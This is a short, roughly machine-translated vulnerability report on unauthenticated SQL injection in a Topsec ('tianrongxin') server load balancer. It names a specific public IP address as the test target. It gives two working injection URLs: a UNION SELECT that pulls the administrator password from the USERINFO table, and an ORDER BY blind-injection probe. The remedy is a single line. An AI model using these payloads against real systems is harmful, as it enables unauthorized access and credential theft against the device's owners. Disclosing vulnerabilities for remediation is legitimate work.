SQL injection vulnerability in tianrongxin Server Load balancer
SQL injection vulnerability in tianrongxin Server Load balancer
The command execution has been completed, and two SQLite injection vulnerabilities are proposed without logon.
This vulnerability is caused by the sqlite injection vulnerability because arp binding is not performed and login verification is not performed. Test ip: http: // 61.148.24.182: 8080, injection 1: Display injection. You can obtain the administrator password http: // 61.148.24.182: 8080/acc/bindipmac/static_arp_setting_content.php? ArpName = 123% 27% 20 union % 20 select %, 1, % 28 select % 20 password % 20 from % 20 USERINFO % 29 --
Injection 2: injection 2: A blind injection, which can be determined by an order error. The SQL statement is successfully executed. Http: // 61.148.24.182: 8080/acc/bindipmac/static_arp_include.php? IfName = 123% 27% 20 order % 20by % 202 --
This vulnerability exists in the Server Load balancer system.
Solution:
Input filtering and permission Control